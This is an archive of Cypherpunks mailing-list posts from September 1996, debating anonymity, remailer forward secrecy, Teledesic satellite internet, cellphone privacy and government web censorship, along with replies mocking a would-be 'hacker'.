Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From zachb at netcom.com Sat Sep 7 23:52:40 1996 From: zachb at netcom.com (Z.B.) Date: Sun, 8 Sep 1996 14:52:40 +0800 Subject: talker In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com> Message-ID: On Sat, 7 Sep 1996, Floyd W Odom wrote: > Dear Whoever, > > I am doom13. If there is anyone out there who is a hacker or > would like to be one you can talk to me and find out stuff like cracking. > Just drop a message at doom13 at juno.com. > > Doom13 > ....another pathetic entry for my killfile. When will these people learn? --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From Adamsc at io-online.com Sat Sep 7 23:55:43 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 8 Sep 1996 14:55:43 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! Message-ID: <19960908044715187.AAA73@IO-ONLINE.COM> On Sat, 7 Sep 1996 16:46:40 -0500, kickboxer wrote: >I really need help unsubscribing from the Cypherpunks list! it is imperative! We could probably just condense that message by removing everything after the fourth word without losing much... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From jwilk at iglou.com Sun Sep 8 00:11:52 1996 From: jwilk at iglou.com (Blake Wehlage) Date: Sun, 8 Sep 1996 15:11:52 +0800 Subject: talker Message-ID: > I am doom13. If there is anyone out there who is a hacker or >would like to be one you can talk to me and find out stuff like cracking. >Just drop a message at doom13 at juno.com. OK.... I'M sick of this spamming..... ITS CYPHERpunks, NOT CYBERpunks. ps.... u don't 'ask someone to be a hacker, u have to find it out ur self.... one more thing... how come all these 'spamers' are from juno... and one make this connect too??? my very own 13 year old $0.02 ========================================== Blake Wehlage ��� R�V�L����� B�+ ��mP@� � ��� Goto: http://members.iglou.com/jwilk From jamesd at echeque.com Sun Sep 8 00:12:08 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 8 Sep 1996 15:12:08 +0800 Subject: Teledesic, the censored internet in the sky. Message-ID: <199609080445.VAA00370@dns1.noc.best.net> Teledesic, the censored internet in the sky. Late last year the organized violence monopolies of the world voted to give Bill Gates 400 Megahertz of bandwidth, at the same frequency in each monopoly. I would guesstimate the value of this grant to be around ten billion dollars. Don't run out and buy Microsoft shares. When I said Bill Gates, I meant Bill Gates. I did not mean Microsoft. Bill Gates intends to build an internet in the sky, eight hundred satellites in low earth orbit, each of them with big bandwidth connections to its nearest neighbors, and each with a four hundred megahertz connection to each of many squares of ground underneath it. What caused the collected killers of the world to show such unanimous generosity towards Bill Gates? Bill Gates proposed a network that would be completely censorable. He will not sell pipes to his space backbone, he will sell pipes from a particular rectangle on the ground to its space backbone. You would buy a right to connect from any place in a single small area, not any a right to connect from any place in the world, and Bill Gates would only sell such rights to government approved organizations, which would then presumably resell connections to private individuals -- connections that would first run through government controlled pipes to check for politically incorrect bits before they reached Bill Gates' sky backbone. Of course we should not condemn him too harshly for this: He needs approval from Singapore, Iran, France, Germany, Communist China, and the like, in order to get a single uniform world wide frequency band, and would be unlikely to get it for any reasonable proposal. The government pipes in his proposal are as useless as wheels on a fish, because he promises his ground stations will be quite cheap. Therefore private citizens who are not permitted direct access to his internet in the sky will feel the impact of tyranny immediately in their wallets. Bill Gates internet in the sky will provide short and near constant latency, therefore telephone connections running through it should be pretty good, whereas existing internet phone sucks mightily. Teledesic is promised to come on line in 2001, though we have seen how Microsoft meets schedules in the past. I conjecture 2006. I also predict that once the scheme is securely in place, and jamming it becomes painful, Bill Gates will find a thousand ways to chisel the government monopoly middlemen in his proposal. I would guess that Motorola's less ambitious Iridium project will only be a year or two late, but it has little potential to revolutionize the world the way Bill Gates proposal has. I expect once the scheme is in place, the government monopolies in Gate's plan will be under attack both from above and from below. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From attila at primenet.com Sun Sep 8 00:31:13 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 15:31:13 +0800 Subject: talker [is illiterate...] In-Reply-To: <199609080340.XAA19752@jekyll.piermont.com> Message-ID: <199609080526.XAA17303@InfoWest.COM> Perry, just look at the gall of the *illiterate* jerk; this was his reply to me: = You know man I am a profesional so don't reply to me = as a novice or anything. I have been doing this since I = wuz 12. And I'm not young for my age I know alot = about hacking and FYI there's alot you could learn from = me so don't think 23 is a young age pal. = = Doom13 = takes all kinds. that's OK, he'll make it to my filter which dumps it to: in-assholes->/dev/null -------------------- In <199609080340.XAA19752 at jekyll.piermont.com>, on 09/07/96 at 11:40 PM, "Perry E. Metzger" said: = Floyd W Odom writes: = > I am doom13. If there is anyone out there who is a hacker or > = > would like to be one you can talk to me and find out stuff like = > cracking. > Just drop a message at doom13 at juno.com. = Are you the same jerk who was posting a week ago? -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From unicorn at schloss.li Sun Sep 8 00:50:36 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 8 Sep 1996 15:50:36 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: On Fri, 6 Sep 1996, Timothy C. May wrote: > At 6:08 PM 9/6/96, stewarts at ix.netcom.com wrote: > > >is done because of the Great Drug Hysteria, but I suspect part of it > >is that pay phone companies don't make money receiving calls, > >so they don't want to tie up their phones doing that; perhaps if > >they charged money to receive calls as well as initiate them, > >they'd be willing to receive calls? > > I am about to start worrying about "junk phone calls" more so than I have > been. I just bit the bullet and bought a digital cellular phone, with a > nifty rate plan called Digital Flex: I get unlimited free airtime from 7 > p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south > of Salinas to north of Santa Rosa and as far east as the Central Valley. In > other words, the entire Bay Area and outlying communities. I can send and > receive calls over this entire region, from anywhere in the region (of > course), without any charges. > > The downside is that calls _from_ or _to_ my phone during "business" hours > are charged 42 cents a minute, airtime (tying up a channel and all), plus > whatever other fees may be applicable at each end. Thus, every "junk call" > I get trying to get me to buy aluminum siding, or to vote Democratic, or to > switch my long-distance carrier (!), costs me a minimum of 42 cents, > depending on how fast I can realize who they are and get rid of them ("Let > me forward you to Jim Bell's AP hotline..."). I suggest doing as I do, that is giving the number to no one at all but forwarding a public number to the cell phone when you need to. "Unlimited forward" allows you to call your own number from anywhere and change forwarding details. Quite useful. > possibilities if this is extended to cover other such areas). The "Digital > Flex" plan from Cellular One is $20/mo for the basic plan, and then $15/mo > on top of that for the unlimited evenings and weekends use. (This could > easily save me the amount I often spend in a month just yakking with > friends and girlfriends who live over the hill in the Valley.) Many digital phone have caller ID which you could use to screen for "urgent" calls when the time is pricy. You might also consider giving folks a beeper number for "urgent calls" and you could then call your voice mail from your cellphone to see if you wish to bother calling back. This has the added advantage of preventing the tracking of your movement by determining which "cell" your phone happens to be on at the moment (phones talk to cells when on but not talking). > --Tim May > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sun Sep 8 01:04:08 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 8 Sep 1996 16:04:08 +0800 Subject: TWA 800 - Friendly Fire? In-Reply-To: <199609062048.NAA32689@abraham.cs.berkeley.edu> Message-ID: On Fri, 6 Sep 1996, John Anonymous MacDonald wrote: > The latest rumor. > > The message came to me from a man who was Safety Chairman for the > Airline Pilots Association for many years and he is considered an > expert on safety. He would not ever spread idle rumor. In short, > he is usually quite certain before saying anything! Feel free to cite his credentials AFTER you disclose his name. :) -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sun Sep 8 01:14:49 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 8 Sep 1996 16:14:49 +0800 Subject: Deleted Message (fwd) Message-ID: -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li ---------- Forwarded message ---------- Date: Sat, 7 Sep 96 16:56:55 -24000 From: MAILER-DAEMON at mqg-smtp3.usmc.mil To: unicorn at schloss.li Subject: Deleted Message To: "Jon Lebkowsky" From: MQG-SMTP3 at USMC_MASTERINET@Servers[] Subject: Re: What is the EFF doing exactly? Message in Transport deleted by: ADMINISTRATOR at USMC_MASTERINET@Servers From unicorn at schloss.li Sun Sep 8 01:15:03 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 8 Sep 1996 16:15:03 +0800 Subject: Deleted Message (fwd) Message-ID: Cute eh? -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li ---------- Forwarded message ---------- Date: Sat, 7 Sep 96 17:00:49 -24000 From: MAILER-DAEMON at mqg-smtp3.usmc.mil To: unicorn at schloss.li Subject: Deleted Message To: "Vladimir Z. Nuri" From: MQG-SMTP3 at USMC_MASTERINET@Servers[] Subject: Re: What is the EFF doing exactly? Message in Transport deleted by: ADMINISTRATOR at USMC_MASTERINET@Servers From unicorn at schloss.li Sun Sep 8 01:15:05 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 8 Sep 1996 16:15:05 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: <199609051749.KAA12335@netcom20.netcom.com> Message-ID: On Thu, 5 Sep 1996, Vladimir Z. Nuri wrote: > > TCM > >>I think cpunks should hold the view that communication is a matter > >>of mutual consent between sender and receiver. if a receiver says, > >>"I don't want any anonymous messages", then should be able to block them. > > > >But this is precisely what nearly all of us have been arguing. Namely, that > >the issue of anonymity vs. providing of True Names, is a matter of > >_contract_ between parties, not something the government is justified in > >sticking its nose into. > [...] > I have seen it repeated here often that somehow anonymity is some kind > of a "right" that one should have in all kinds of different & important > transactions, not merely on "cyberspace debate societies". I see > here frequently the implication that *private*entities* that want to > enforce identity in their own transactions are somehow implementing > a corrupt, orwellian system. it sounded to me like that was all > Dyson was advocating. "I have seen it repeated here often that somehow compelled identity is some kind of a 'right' that one should have in all kinds of different & important transaction, not merely on 'cyberspace debate societies.' I see here frequently the implication that *private*entities* that want to enforce compelled identity in their own transactions are somehow implementing a corrupt, orwellian system." (That put it into prespective for you "Vlad?") > "this is all we really want". what about situations > where the government requires you to give a physical identity for > some kind of a license etc? do you think there are no such valid > situations? You are twisting, "Vlad." If you really think that the issue is one of what specific times government can demand anonymous transactions you overestimate the role of government as well as the ability to demand such transactions on a per situation rather than "as a whole" basis. For example. A friend of mine has never had a social security number or a drivers license with his real name on it. He has effectively had nothing but anonymous transactions with anyone who thought that by asking him for a SSN or driver's license they were getting identity credentials. His basis is philsophical, not criminal. I might add that he lives quite normally, works for a big mainstream company, and pays taxes. Every once in a while he switches his credentials around a bit to avoid paper trailing. Please, if you can, point out the harm he is inflicting. You can't. There is none. The harm you can identify is the classic "but it might be used for... [insert nastiness in vogue this week here]" > is there any role for a government whatsoever in > CryptoAnarchist Utopia and if so, is there any situation in which > demanding physical identity is reasonable? It is reasonable for any private parties to refuse to do business with or otherwise associate with parties who refuse to divulge their identity. Government in a CryptoAnarchist Utopia will have a very hard time doing business with anyone if they make this a requirement I think. > >No, Dyson said "Therefore I would favor allowing anonymity -- with some > >form of traceability only under terms considerably stronger than what are > >generally required for a wiretap." > > > >This implies a role for government, and concomitant restrictions on related > >anonymity technologies, to provide traceability. So much for mutual > >agreement between sender and recipient. > > it's clear Dyson hasn't totally thought out her position on anonymity. > imho you are reading too much into her existing positions. because of your > government paranoia, you assume that when someone says they want > traceability, they are implying they want the government to > enforce it in all situations. Tell me "Vlad," if government won't, who will? I submit that it is impossible to enforce compelled identity other than through government. I also submit that to do it you have to create a registration process for all mediums. Pay phones, ISPs, private leaflets, cash... etc... etc. So long as cash and payphones exist, (or so long as cash and pre-paid cellular exists) so will anonymous transactions. Again, the question is, what are you going to do to prevent, e.g., me, "Black Unicorn" from publishing as I do now? > >(I have nothing against senders and recipients agreeing to use the services > >of some third party in providing ultimate traceability. I'm not wild about > >the U.S. Government being this third party, paid for by tax money, but so > >long as it is not required, it's a minor concern to me. > > that's what something like what Dyson has been referring to would suggest > to me. that is, that's exactly the system she sounded like she was > loosely advocating. Crap. Such a system exists today. It's called the "filter." If you don't want to transact with anonymous people, then IGNORE them. Why impose compelled disclosure on everyone? [Yadda Yadda about Copyright and own-back-patting about "subtlies" that others will miss deleted.] -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From gsi at juno.com Sun Sep 8 01:45:15 1996 From: gsi at juno.com (floyd w odem) Date: Sun, 8 Sep 1996 16:45:15 +0800 Subject: No Subject Message-ID: <19960907.013714.12478.0.gsi@juno.com> If you would like to get your hands on the 96 hackers catalog its here and if you want to have it : to get it thriugh the snail mail system send 1.00 to the address below to get it through e-mail send .50 to the address below Patrick Cummings GSI 6302 Maple st. omaha,ne 68104 for more information write to gsi at juno.com From jf_avon at citenet.net Sun Sep 8 01:59:41 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Sun, 8 Sep 1996 16:59:41 +0800 Subject: (Fwd) Teledesic, the censored internet in the sky. Message-ID: <9609080703.AA27267@cti02.citenet.net> -----BEGIN PGP SIGNED MESSAGE----- to: Bill Gates, Microsoft Corp. From: jf_avon at citenet.net Date: 8 sept 1996 Cc.: cypehrpunks at toad.com Mr. Gates Could you please enlighten me about this proposed system and about the veracity of the following information? Thanks jfa - -- Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies R&D consultants: physicists technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 - ------- Forwarded Message Follows ------- Date: Sat, 07 Sep 1996 06:22:47 -0700 To: cypherpunks at toad.com From: "James A. Donald" Subject: Teledesic, the censored internet in the sky. Teledesic, the censored internet in the sky. Late last year the organized violence monopolies of the world voted to give Bill Gates 400 Megahertz of bandwidth, at the same frequency in each monopoly. I would guesstimate the value of this grant to be around ten billion dollars. Don't run out and buy Microsoft shares. When I said Bill Gates, I meant Bill Gates. I did not mean Microsoft. Bill Gates intends to build an internet in the sky, eight hundred satellites in low earth orbit, each of them with big bandwidth connections to its nearest neighbors, and each with a four hundred megahertz connection to each of many squares of ground underneath it. What caused the collected killers of the world to show such unanimous generosity towards Bill Gates? Bill Gates proposed a network that would be completely censorable. He will not sell pipes to his space backbone, he will sell pipes from a particular rectangle on the ground to its space backbone. You would buy a right to connect from any place in a single small area, not any a right to connect from any place in the world, and Bill Gates would only sell such rights to government approved organizations, which would then presumably resell connections to private individuals -- connections that would first run through government controlled pipes to check for politically incorrect bits before they reached Bill Gates' sky backbone. Of course we should not condemn him too harshly for this: He needs approval from Singapore, Iran, France, Germany, Communist China, and the like, in order to get a single uniform world wide frequency band, and would be unlikely to get it for any reasonable proposal. The government pipes in his proposal are as useless as wheels on a fish, because he promises his ground stations will be quite cheap. Therefore private citizens who are not permitted direct access to his internet in the sky will feel the impact of tyranny immediately in their wallets. Bill Gates internet in the sky will provide short and near constant latency, therefore telephone connections running through it should be pretty good, whereas existing internet phone sucks mightily. Teledesic is promised to come on line in 2001, though we have seen how Microsoft meets schedules in the past. I conjecture 2006. I also predict that once the scheme is securely in place, and jamming it becomes painful, Bill Gates will find a thousand ways to chisel the government monopoly middlemen in his proposal. I would guess that Motorola's less ambitious Iridium project will only be a year or two late, but it has little potential to revolutionize the world the way Bill Gates proposal has. I expect once the scheme is in place, the government monopolies in Gate's plan will be under attack both from above and from below. --------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQEVAgUBMjIM9MiycyXFit0NAQFv0wf/dD4REx7IYcp/X+seWiDF73Z8Kr37E2IS rLub4J6XamQw2fMhDzgHiNhpy5HWH/mY1mQjOdhe5kA204aQKHk8ktXCQW6YC7fA VZCbJ+RJ0pluozWGOOC/hUbYed2vCEBjnjpBHaiFC3dHGVxHF43+L7nlp+RaeRCY Wb0H6XzwEh3Lei+vMzn/28RIJGabUOPSvDM6vK0AwNyZDXHobg/Ys7bTo9T8odvB Hz2WR2yBWT1uM1vasHfYDXeFwTvqFbdBv5TWXhNYzCdF6sexRAgD/iofoPmTLxno FdeVbG9pK09Zd3UDAu8x6Oojgi28S686f49YT0TyyeK8IjXNU9vYxQ== =F/SH -----END PGP SIGNATURE----- From zachb at netcom.com Sun Sep 8 02:00:09 1996 From: zachb at netcom.com (Z.B.) Date: Sun, 8 Sep 1996 17:00:09 +0800 Subject: talker [is illiterate...] In-Reply-To: <199609080526.XAA17303@InfoWest.COM> Message-ID: On Sun, 8 Sep 1996, attila wrote: > Perry, just look at the gall of the *illiterate* jerk; this > was his reply to me: > [snip] > > takes all kinds. that's OK, he'll make it to my filter which > dumps it to: > > in-assholes->/dev/null You mean that you actually *wait* for a reply before killfiling him? As soon as I see a message here asking about hacking or cracking or other stuff like that, it's wham bam /dev/null, ma'am! :) --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From loki at infonex.com Sun Sep 8 02:04:52 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 8 Sep 1996 17:04:52 +0800 Subject: forward secrecy in mixmaster In-Reply-To: <199609061703.SAA00170@server.test.net> Message-ID: At 10:03 AM -0700 9/6/96, Adam Back wrote: >Since Peter Allen's discussion of mixmaster, I started doing something >I'd been thinking of for a while, since noticing that it was on the >mixmaster to-do list months ago (ie there is unfinished source to do >this): direct socket connections and diffie-hellman key exchange for >forward secrecy. The code is still out there to look at. I warn you though, it is steaming horse manure. ;) >I wrote the socket stuff yesterday evening, didn't take too long as >socket programming is something I've done lots of. > >Now comes what do you actually send down the sockets. > >Question for Lance, and any others who were involved in mixmasters >implementation: what did you have in mind as a way of negotiating the >DH keys? > >I notice that mixmaster generates a DH key and stores it in file >`DH.mix', but that this is not (as far as I can see from the source) >included in the remailers public key block. No, it is not in the key block. It would be passed during the negotiation. >(A couple of comments as an aside: I think that you should be able to >have a much smaller generator without loss of security, this should >reduce the overhead of a DH key exchange. Using 3 even I think is >safe, without any extra precautions on prime generation. You can even >go to 2, with a few precautions (PGPfone does this). Comment #2 I >think 1024 may be a bit small, I don't have any figures handy for >relative security of DH key lengths, but PGPfone offers 4096 bit DH >for instance. Does rsaref have limits on prime lengths for DH, the >same as it does for RSA?). Call me paranoid. After asking and reading around I decided I wanted to cover my bases. It looked like, in the future, it might be easier to break with small generators. This is not a critical decision though. I too would have liked it longer, but using RSAREF I am limited. That is one of the reasons I have each remailer creat its own DH modulus, and allow it to change it periodically. >There are lots of options for DH public key negotiation. > >First option is whether you have a common prime and generator for all >remailers or not. If you have a common prime, accusations of the >prime being `cooked' (chosen to have a weakness) can be mitigated by >using a deterministic generation method based on the hash of a known >phrase (a Jefferson quote perhaps), or PI or whatever. > >A common modulus may offer a fatter target for attack (for some >precomputation attacks), but with large enough keys this probably >isn't that bad, as there aren't that many mixmasters anyway. > >With a common modulus there is DH key negotiation needed, just include >it with the source. You have spelled out why I like having each remailer use its own modulus. >For different modulii for each remailer, there are more options: > >a) include the DH key signed by the RSA key in the remailers public key > (may break backwards compatibility with existing versions of > mixmaster) > >b) send the DH public key at the start of each session > >c) send the DH public key on request I chose C. The in protocol I developed the sending remailer (A) sends a hash of the DH modulus to the receiving remailer (B). If B has it, they use it. If not, A sends it. I use the modulus from A because it has the stake in privacy. B will take messages from anyone, but A wants to know the messages it has goes to the correct other remailer B. >There is also a question of which key do you use, the sender remailers >or the recipient remailers. > >Negotiating DH public keys during execution also opens the possibility >for periodic re-keying. > >Thats the end of my thoughts on direct socket mixmaster. > >Next message is some thoughts on non-interactive forward secrecy >protocols. > >Adam Here is a description of the protocol I wrote many months ago. The message assumed the above discussion of distributing the DH modulus. --------------Start Old Message-------------- It is too bad that I was never able to debug my socket code. It is more or less all done. The advantage of the socket code is that it allows the message to be super-encrypted with a DH negotiated key which provides forward security for intercepted messages. There is a built in authentication for the DH (against MITM attacks) in the RSA key used to encrypt the remailer message to the next remailer. I can send the code I wrote to anyone on demand (within the US of course). This basically pushes the key authentication job onto the original sender where it belongs. The key ID (16 byte fingerprint) is visible in the clear in the header of the message remailer A is about to send to remailer B. Remailer A either has the key corresponding to that fingerprint, or it requires remailer B to send it the key. Remailer B must have the key or it would not be able to read the message any way. A different RSA key can not be sent because of the strength of the MD5 fingerprint. Remailer A sends its DH key half to B along with a challenge number, all encrypted under B's RSA key. Return of the challenge number along with B's DH key half, completes the authenticated exchange. The second half could also be encrypted with a 3DES key provided along with the challenge number if desired. The whole point of all this is that if the message is intercepted and presented to B with a demand to decrypt it, B will be unable to comply, even if it wished to. -Lance --------------End Old Message-------------- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From proff at suburbia.net Sun Sep 8 03:02:35 1996 From: proff at suburbia.net (Julian Assange) Date: Sun, 8 Sep 1996 18:02:35 +0800 Subject: LACC: Re: What is the EFF doing exactly? In-Reply-To: <32303FDA.493B@hydra.acs.uci.edu> Message-ID: <199609080749.RAA01948@suburbia.net> > Julian Assange wrote: > > Certain members of the EFF board seem to be politically naive. The > > rational, intelligent lobbyist will always see both sides of the > > argument. Presenting both sides of the argument to the world at large > > is another matter altogether. You should only present both sides of the > > argument to the inner policy tactics personnel only in order to formulate > > policy and create defences for the weaknesses in your position. To the > > outside world only ever sees a united front. This is basic politics. > > This is certainly the way most people in political roles handle things, > and it is certainly an effective way of handling simple-minded people. > > However, it is one thing I find very difficult to respect. Respect or not, if your team is small and the field is large, and everyone else is playing gridiron, then don't expect to prove anything but your stupidity by playing cricket. > How many of the world's stupid policies have been enacted, because > someone decided to present only one side of an issue, realized it was > "the wrong side", and felt they couldn't later change their mind for the > better - because they presented the issue as overly black-and-white > initially? I agree, however you are confusing large parties, so dominant as to form government and policy at whim with those that represent a particular cause or interest group. The EFF falls into the latter category. Its goals are relatively narrow, its membership tiny. Such a small group, fighting under-resourced battle against powerful, conservative interests does not need, and should not espouse the arguments of those who seek to destroy it. When Canoing up a waterful, one does not need to paddle backwards 50% of the time in order to be "fair". -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From whgiii at amaranth.com Sun Sep 8 03:14:18 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sun, 8 Sep 1996 18:14:18 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <199609080818.DAA09824@mailhub.amaranth.com> In , on 09/08/96 at 10:14 AM, Enzo Michelangeli said: >On Sat, 7 Sep 1996, Hallam-Baker wrote: >> There is a massive difference between anonymous speech and anonymous >> transactions. Anonymous speech can create problems (defamation etc.) >> but in the main these are not problems the courts are particularly >> good at dealing with. >Perhaps, but defamation is an issue that can't be ignored either, >especially if one tries to build systems based on reputation. Actually it can. :) There are already checks and balances in dealing with defamation. Take the following example: I post a message stating that Phil Zimmerman is a @#$! and that PGP is full of holes. The immediate responce I would receive from the group would be some rather nasty flames, a couple of questions, most would ignore. Because Phil has a much greater reputation than I do such a blatant defamation would do my reputation much harm while doing his little or no harm. It may actually improve his reputation by the many follow up posting re-affirming his good reputation and his quality product. The only way I could get away with such a message would be to back it up with some strong proof and the support of others with equal or greater reputation as Phil. Now if I anonymously post the same message. The results would be the same as above only no one but the truly "net clueless" would pay any attention to the message. It would be seen as a "troll" and be dealt with accordingly. Once again no damage has been done to Phil's reputation. Now where things get intrusting is when the rolls are reversed. Say Phil posts a message that I am a @#$@%!!! and my product is full of holes and that I am realy a NSA stooge. Many at first would take Phil's word at face value because his reputation is much better than mine. It is only my fault that my reputation is not equal or greater than his. Because of this I now have two choices, I can stay and fight for the harts and minds of the group or I can pack up my toys and go home. Say I decide to fight. After much work, & many messages I prove that Phil's statements are untrue & manage to convert the group to my side. My reputation has now been greatly inhanced and Phil's reputation has suffered. In the current system if one repetitively post slander to a group his reputation will be distroyed beyond all repair. There is a genuine disincentive against slander in a system built on reputation. No additional "forces" are needed. The addition of libel laws would actually hurt such a system. The threat of a libel suite could be used to inhibit debate on a topic or questioning of ones reputation. -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- MR/2 Tag->Windows: The Gates of hell. From frissell at panix.com Sun Sep 8 06:27:47 1996 From: frissell at panix.com (Duncan Frissell) Date: Sun, 8 Sep 1996 21:27:47 +0800 Subject: Edited Edupage, 5 Sep 1996 Message-ID: <2.2.32.19960908113654.00dc4480@panix.com> >>CHINA SCREENS OUT "SPIRITUAL POLLUTION" ON THE NET >>The Beijing government has begun blocking as many as 100 Internet sites that >>offer material the government deems unsuitable for its citizens -- including >>dissident viewpoints from Hong Kong and Taiwan, sites sponsored by U.S. >>major media organizations such as CNN and the Washington Post, and sexually >>explicit sites such as Playboy and Penthouse. An official described the >>blocked sites as suspected purveyors of "spiritual pollution." (Wall Street >>Journal 5 Sep 96 B12) Gee only 100 bad sites on the net out of thousands of web sites. Looks cleaner than a hound's tooth to me. And Germany trying to block two sites a year (but failing). At that rate they'll really "shut 'er down." Note the subtle problem. With thousands of "bad sites" combined with bureaucratic sloth the governments of the world are bailing with a teaspoon. We ca put 'em up faster than they can knock them down particularly since they can't knock them down at all. DCF From perry at alpha.jpunix.com Sun Sep 8 06:30:15 1996 From: perry at alpha.jpunix.com (John A. Perry) Date: Sun, 8 Sep 1996 21:30:15 +0800 Subject: New type2.list/pubring.mix Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hello Everyone, I just updated the type2.list/pubring.mix combination on jpunix.com. This update includes the addition of the dustbin and jenanon remailers Welcome aboard! The files are available by WWW from www.jpunix.com as well as anonymous FTP from ftp.jpunix.com. John Perry - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjKtO1OTpEThrthvAQHthgQApkbVzoc2NbYMm0U0Wcr3y2LpCY96/adT 2bLBg87S+CIStRHc2XirdjGk97TnN2p/1RBySqOIjH0a9Jajrso2yQYn7nQZ3/2W wIq2ZrQF1971IeajIBSEmNzD4lhr7Tkqi2WhVGHFEVboMvcp7Nw+wGxOfyaXP6mj uvZkIFAfDW0= =O4WA -----END PGP SIGNATURE----- From edyson at edventure.com Sun Sep 8 09:22:21 1996 From: edyson at edventure.com (Esther Dyson) Date: Mon, 9 Sep 1996 00:22:21 +0800 Subject: The Esther Dyson Flap Message-ID: <19960908135750483.AAO156@Esther> FWIW, I'm still collecting some thoughts, because this is a complex topic (as you all know), and I'm tired of having my views misinterpreted and misattributed. So I want to state them clearly and carefully. This is simply a reaction to one item. At 09:12 PM 9/4/96 -0500, Chuck Thompson wrote: >>Date: Tue, 3 Sep 1996 14:23:40 -0700 >>X-Sender: tcmay at mail.got.net >>To: cypherpunks at toad.com >>From: tcmay at got.net (Timothy C. May) >>Subject: Re: The Esther Dyson Flap >>Sender: owner-cypherpunks at toad.com >> ...................... Please note the quote marks carefully. I said [something like] the first paragraph, but the rest is the "reporter" from Scientology, plus a paraphrase. >> >>By the way, the Scientologists have also noted her views: >> >>"Esther Dyson, member of the board of directors of the Electronic Frontier >>Foundation and member of the National Information Infrastructure Advisory >>Council, spoke on the anonymity issue at the fifth Computers, Freedom & >>Privacy (CFP) conference in San Francisco. "I have a concern about the >>spread of bad behavior on the Net," said Dyson. "Anonymity figures into >>this, and I feel that it has proven to not be a positive factor. It breaks >>down >>the community which we are seeking to build, and could turn the 'big >>cities' of the information infrastructure into a big cesspool." >> >>"Remailers who facilitate anonymous postings are part of the problem. They >>can act as conduits for those who seek anonymity as a way to act illegally >>without getting caught; yet remailers are able to shield themselves from >>responsibility or liability. >> >>"Computer experts stress that anonymous users should at least be trackable >>by the remailers -- and that ones who act unlawfully can easily put the >>remailers at risk. Dyson noted that in self-regulatory schemes for almost >>any part of the Internet, "visibility, not anonymity, would have a strong >>place."" >> >>(end quote, from "Freedom," at http://www.theta.com/goodman/hijack.htm) >> > Esther 